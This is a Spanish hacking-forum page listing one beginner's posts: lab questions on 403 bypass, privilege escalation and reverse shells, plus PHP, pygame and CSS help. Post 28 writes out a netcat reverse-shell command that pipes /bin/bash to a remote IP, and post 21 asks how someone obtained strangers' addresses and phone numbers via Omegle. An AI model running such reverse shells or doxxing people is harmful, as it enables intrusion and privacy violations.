elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Los 10 CVE más críticos (peligrosos) de 2020


  Mostrar Mensajes
Páginas: 1 2 [3] 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 ... 27
21  Foros Generales / Foro Libre / Como es posible esto? [Omegle] en: 19 Abril 2022, 05:00 am
Hola, estaba viendo un vídeo del buen s4vitar en el que le hacía bromas con con información real a muchos usuarios (información de ellos), tengo en tendido que en los paquetes que maneja Omegle se pueden interpretar y mediante eso conseguir la IP, para así tener una aproximación de dónde viven....

Pero como ***** hizo s4vitar para conseguir nombre, apellido, dirección exacta, número de teléfono y entre otros???

Acaso uso técnicas avanzadas de osInT o algo similar???

Gracias!!


Video de s4vitar
22  Seguridad Informática / Hacking / Re: Error 403 en: 29 Marzo 2022, 11:33 am
403 indica que se te prohibe el acceso al recurso. Per se, no implica nada. Yo puedo hacer que mi servidor responda sienpre 403 a todo el mundo en todos los recursos.

Lo que le da significado es el contexto en el que se produce. Está la máquina virtual en github o algún sitio público?


Hola gracias por tu respuesta.

La máquina es una de hack the box (la cual forma parte de las retiradas), preguntaba si se podía saltar el bloqueo de 403 porque quería acceder a los plugins del sitio para ver si podía probar un directory traversal.

Pero, el 403 no me daba acceso a esa carpeta.
23  Seguridad Informática / Hacking / Error 403 en: 28 Marzo 2022, 03:53 am
Hola a todos, estoy con una maquina (vulnerable) que descarge, estoy tratando de acceder a determinadas partes, pero no puedo por el eror 403, mi pregunta es... Hay alguna forma de modificar la consulta http para lograr engañar ese erorr? O sea, con burpsuite hacerle un bypass?




Gracias!
24  Programación / Desarrollo Web / Re: Ayuda, servidor web apache y php en: 23 Marzo 2022, 00:30 am
Pues para encontrar cualquier error con php activa la depuración o mira los logs registro de php

Añade:

Código
  1. <?php
  2. ini_set("display_errors", 1);
  3. // Notificar todos los errores de PHP (ver el registro de cambios)
  4. ?>


Gracias!!!

Encontre el codigo de error
Código:
Warning: file_put_contents(contacts.json): Failed to open stream: Permiso denegado in /opt/lampp/htdocs/contacts-app/add.php on line 23
/code]


Ahora tengo que buscar la forma de tener permisos, creo.
25  Programación / Desarrollo Web / Ayuda, servidor web apache y php en: 23 Marzo 2022, 00:03 am
Hola, como estan?


Tengo un problema, soy nuevo en php, queria tratar de crear un archivo php el cual haga que cree un Json.Hasta ahi todo bien, dentro de mi IDE funciona (Si lo ejecuto el Json se crea), pero al momento de iniciar un servidor apache y probar el php desde ahi, el archivo json no se genera con nada.


Alguien tiene idea de como arreglar esto?

Dejo el codigo

Código:
<?php
//Variables super globales

  //Esta variable tiene infomracion sobre la peticion http que nos han mandado
 
if ($_SERVER["REQUEST_METHOD"] = "POST"){
  $contact = [
    "name" => $_POST["name"],
    "phone_number" => $_POST["phone_number"],
  ];

 

  $contacts = [];
  $contacts[] = $contact;

  file_put_contents("contacts.json", json_encode($contacts));


  echo($file);
  //header("Location: index.php");
}

?>




<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <meta http-equiv="X-UA-Compatible" content="IE=edge">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">

  <!-- Bootstrap -->
  <link
    rel="stylesheet"
    href="https://cdnjs.cloudflare.com/ajax/libs/bootswatch/5.1.3/darkly/bootstrap.min.css"
    integrity="sha512-ZdxIsDOtKj2Xmr/av3D/uo1g15yxNFjkhrcfLooZV5fW0TT7aF7Z3wY1LOA16h0VgFLwteg14lWqlYUQK3to/w=="
    crossorigin="anonymous"
    referrerpolicy="no-referrer"
  />
  <script
    defer
    src="https://cdn.jsdelivr.net/npm/bootstrap@5.1.3/dist/js/bootstrap.bundle.min.js"
    integrity="sha384-ka7Sk0Gln4gmtz2MlQnikT1wXgYsOg+OMhuP+IlRH9sENBO0LRn5q+8nbTov4+1p"
    crossorigin="anonymous"
  ></script>

  <!-- Static Content -->
  <link rel="stylesheet" href="./static/css/index.css" />

  <title>Contacts App</title>
</head>
<body>
  <nav class="navbar navbar-expand-lg navbar-dark bg-dark">
    <div class="container-fluid">
      <a class="navbar-brand font-weight-bold" href="#">
        <img class="mr-2" src="./static/img/logo.png" />
        ContactsApp
      </a>
      <button
        class="navbar-toggler"
        type="button"
        data-bs-toggle="collapse"
        data-bs-target="#navbarNav"
        aria-controls="navbarNav"
        aria-expanded="false"
        aria-label="Toggle navigation"
      >
        <span class="navbar-toggler-icon"></span>
      </button>
      <div class="collapse navbar-collapse" id="navbarNav">
        <ul class="navbar-nav">
          <li class="nav-item">
            <a class="nav-link" href="index.php">Home</a>
          </li>
          <li class="nav-item">
            <a class="nav-link" href="add.php">Add Contact</a>
          </li>
        </ul>
      </div>
    </div>
  </nav>

  <main>
    <div class="container pt-5">
      <div class="row justify-content-center">
        <div class="col-md-8">
          <div class="card">
            <div class="card-header">Add New Contact</div>
            <div class="card-body">
              <form method="POST" action="add.php">
                <div class="mb-3 row">
                  <label for="name" class="col-md-4 col-form-label text-md-end">Name</label>
   
                  <div class="col-md-6">
                    <input id="name" type="text" class="form-control" name="name" required autocomplete="name" autofocus>
                  </div>
                </div>
   
                <div class="mb-3 row">
                  <label for="phone_number" class="col-md-4 col-form-label text-md-end">Phone Number</label>
   
                  <div class="col-md-6">
                    <input id="phone_number" type="tel" class="form-control" name="phone_number" required autocomplete="phone_number" autofocus>
                  </div>
                </div>
   
                <div class="mb-3 row">
                  <div class="col-md-6 offset-md-4">
                    <button type="submit" class="btn btn-primary">Submit</button>
                  </div>
                </div>
              </form>
            </div>
          </div>
        </div>
      </div>
    </div>
  </main>
</body>





Gracias!!!
26  Seguridad Informática / Hacking / Escalar privilegios en: 10 Marzo 2022, 16:49 pm
Hola, estoy practicando hacking, hice una web con http simple y con php trate de hacer una reverse shell ,Hasta ahi bien.


La cosa es que cuando pongo
Código:
Whoami
Me dice
Código:
daemon

El cual es lo que esta ejecutando http, pero mi pregunta es

Hay forma de ir de deamon a root?

Gracias!
27  Seguridad Informática / Hacking / Re: Reverse shell a ip publica en: 23 Febrero 2022, 13:55 pm
Tu IP pública no apunta directamente a tu máquina. Aquí se pueden dar mayoritariamente 2 casos:

1. Tu IP pública apunta directamente a tu router/modem. En este caso, el router es el que decide después como direccionar los paquetes hacia el resto de máquinas que se conectan a el. Si es el caso, cuando haces una solicitud directa a esa IP, es el router el que recibe la conexión y como no hay intercambio ni traza que seguir, los paquetes los descarta.  En este caso puedes hacer un Virtual Zone apuntando X puerto directo hacia la IP privada de tu máquina, o abrir una DMZ (Zona desmilitarizada) que apunta todo el tráfico (todos los puertos y protocolos) a una máquina de la red privada. A esto se le conoce de toda la vida como abrir puertos.



2. Tu IP pública es compartida entre varios. Esto se conoce como CG-NAT y es una forma de ahorrar direcciones IP por parte del ISP. Esto quiere decir que cuando solicitas algo a "tu" IP pública, en realidad te está respondiendo un router/switch de tu ISP. Ese router/switch de tu ISP es el que se encarga de direccionar el tráfico según deba. Es como tu router de casa, pero sin que tengas control ninguno sobre el. En este caso no puedes abrir puertos ni puedes hacer una DMZ. La única opción que te queda es usar redes VPC/VPN externas que hagan de intermediario entre tu máquina y sus IP públicas.


Algo para cosas básicas que te sirve para ambos casos es ngrok. Ahí te dan un host externo y hacen de intermediario entre tu maquina y ese host.

https://ngrok.com/


Saludos


Gracias!!

Creo que me tiró más por el primer caso
28  Seguridad Informática / Hacking / Reverse shell a ip publica en: 23 Febrero 2022, 03:05 am
Hola, como estan? Espero que muy bien :)

Estaba tratando de hacer una "reverse shell" a un equipo de mi red privada, pero sin usar la ip privada. Sino que la ip publica.

Cuestion, hago lo siguiente:

Mi equipo
Código:
┌──(panic0㉿192)-[~]
└─$ nc -nlvp 433


A la maquina victima (La reverse shell)
Código:
┌──(leoj㉿666)-[~]
└─$  nc <ip publica> <puerto> -c /bin/bash

Pero, al momento de hacer esto pasa lo siguiente
Queda el comando ejecutado en la terminal

Y despues, se sale.

Quedando la terminal asi (Normal, como si no ejecutase ningun comando)
Código:
┌──(panic0㉿192)-[~]
└─$         






Saben por que pasa esto? O estoy haciendo algo mal?

Cabe aclarar que soy muy nuevo en esto :)

Gracias!!


29  Programación / Scripting / [PYTHON PYGAME MIXER] Como puedo reproducir una serie de canciones en bucle? en: 19 Febrero 2022, 18:49 pm
Hola a todos, como estan?

Estoy haciendo un reproducor en python3, y tengo un pequeño problema.

La cosa es que quiero reproducir una serie de canciones las cuales estan en una lista, ya saben, hice lo que cualquiera haria, poner un for y dentro de ese for que vaya tomando el string y vaya reproduciendo todo... Pero no funciona

Les dejo el codigo :)
Código:
#Librerias 
#pygame
#mutagen
#tinytag

from pygame import mixer
from mutagen.mp3 import MP3
from tinytag import TinyTag
import os
import time


clear = lambda :(os.system("clear"))


songs = ["path_song","path_song2"]

mixer.init()


for song in songs:

    tag = TinyTag.get(song)

    mixer.music.load(song)

    mixer.music.set_volume(0.2)
    mixer.music.play()

    song_duration = MP3(song)
    song_duration = song_duration.info.length
    song_duration = round(song_duration)


def duration_time(song_duration):
    end_minute       = 0
    end_beginning    = 0
    end_aux_duration = 0
    while True:
        if end_aux_duration == song_duration:
            break
        else:
            end_beginning = end_beginning + 1
            end_aux_duration = end_aux_duration + 1
            if end_beginning == 60:
                end_minute = end_minute + 1
                end_beginning = end_beginning - 60
    end_aux_duration =  str(end_minute),":",str(end_beginning).zfill(2)
    end_duration = "".join(end_aux_duration)


    minute       = 0
    beginning    = 0
    aux_duration = 0
    while True:
        if aux_duration == song_duration:
            break
        else:
            beginning = beginning + 1
            aux_duration = aux_duration + 1
            time.sleep(1)
            clear()
            if beginning == 60:
                minute = minute + 1
                beginning = beginning - 60

        print(f"{minute}:",f"{beginning}".zfill(2), " ------ O ------ ",end_duration)




duration_time(song_duration)
    



Gracias!!!
30  Programación / Desarrollo Web / Como puedo DIVidir una pagina? en: 15 Febrero 2022, 01:26 am
Hola a todos, como estan?

Estoy practicando html y css, y queria tratar de dividir una pagina web.

O sea, poner, about us, contact, projects y cosas asi todo en una misma pagina.

Tengo esto, pero no creo que este bien.

HTML
Código:
<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="stylesheet" href="css/style.css">
    <script src="js/javascript.js"></script>
    <title>Document</title>
</head>

<body>
    <div class="wrapper">
        <div class="test1">
            <h3>about us</h3>
        </div>
    </div>
    <div class="wrapper-2">
        <div class="test1">
            <h3>contact</h3>
        </div>
    </div>

</body>

</html>

CSS
Código:

body{
    padding: 0;
    margin: 0;
}

.wrapper{
    display: flex;
    background-color: red;
    height: 1000px;

}

.wrapper-2{
    display: flex;
    background-color: rgb(25, 0, 255);
    height: 1000px;

}
Páginas: 1 2 [3] 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 ... 27
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines